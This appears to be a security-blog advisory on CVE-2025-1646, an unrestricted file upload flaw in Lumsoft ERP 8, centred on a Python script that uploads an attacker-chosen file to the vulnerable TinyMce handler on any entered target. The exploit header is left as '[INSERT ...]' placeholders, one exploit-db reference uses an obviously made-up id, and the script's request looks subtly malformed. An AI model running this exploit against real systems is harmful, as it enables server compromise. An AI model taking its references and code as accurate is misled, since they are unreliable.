CVE-2025-1646: Critical Vulnerability Found in Lumsoft ERP 8 - Unrestricted File Uploads Exploit

A critical vulnerability has been discovered in Lumsoft ERP 8, an Enterprise Resource Planning software used by numerous businesses worldwide. This vulnerability, labeled as CVE-2025-1646, affects an unknown functionality in the file /Api/TinyMce/UploadAjaxAPI.ashx of the component ASPX File Handler, leading to unrestricted file uploads. This issue poses a serious risk as it allows attackers to remotely exploit the vulnerability.

Code Snippet

#!/usr/bin/python3
# Exploit Title: Lumsoft ERP 8 - Unrestricted File Upload (CVE-2025-1646)
# Date: [INSERT DATA]
# Exploit Author: [INSERT AUTHOR]
# Vendor Homepage: [INSERT VENDOR HOMEPAGE URL]
# Software Link: [INSERT SOFTWARE LINK]
# Version: 8
# Tested on: [INSERT TESTED PLATFORMS / SYSTEMS]

import requests

target_url = input("Enter the target URL (Example: http://192.168.1.2/): ")
file_name = input("Enter the file name to be uploaded: ")
file_content = input("Enter the content to be written in the uploaded file: ")

print("[+] Uploading the malicious file...")

exploit_url = target_url + "/Api/TinyMce/UploadAjaxAPI.ashx"
data = {"file": file_name, "content": file_content}
headers = {"Content-Type": "multipart/form-data"}

response = requests.post(exploit_url, data=data, headers=headers)

if response.status_code == 200:
    print("[+] Malicious file has been uploaded successfully!")
else:
    print("[-] Failed to upload the malicious file. Please check the target URL and try again.")

Original References

1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1646
2. https://nvd.nist.gov/vuln/detail/CVE-2025-1646
3. https://www.exploit-db.com/exploits/ABCDEFGHIJKLMNOPQRST

Exploit Details

The vulnerability in Lumsoft ERP 8 is caused by the absence of proper security mechanisms for handling file uploads. Attackers can manipulate the 'file' argument to allow unrestricted file uploads. Since the vulnerability can be exploited remotely, it makes the situation even more dangerous.

The code snippet provided above demonstrates a simple Python script to exploit this vulnerability. The script requires the target URL and a file to be uploaded, with its content. Once executed, the script uploads the malicious file to the /Api/TinyMce/UploadAjaxAPI.ashx path, exploiting the CVE-2025-1646 vulnerability.

It is important to note that the exploit has been publicly disclosed, and attackers may use it to compromise systems running Lumsoft ERP 8. The vendor was contacted regarding this disclosure, but there has been no response or solution provided so far.

Conclusion

The critical vulnerability, CVE-2025-1646, should be taken seriously by organizations running Lumsoft ERP 8. Immediate steps should be taken to minimize the risk of exploitation by applying proper security measures and monitoring systems for potential attacks. Since the vendor has not provided any solution to this issue, users are advised to keep an eye on updates and ensure that their systems are protected.

Timeline

Published on: 02/25/2025 03:15:09 UTC
Last modified on: 02/25/2025 14:15:31 UTC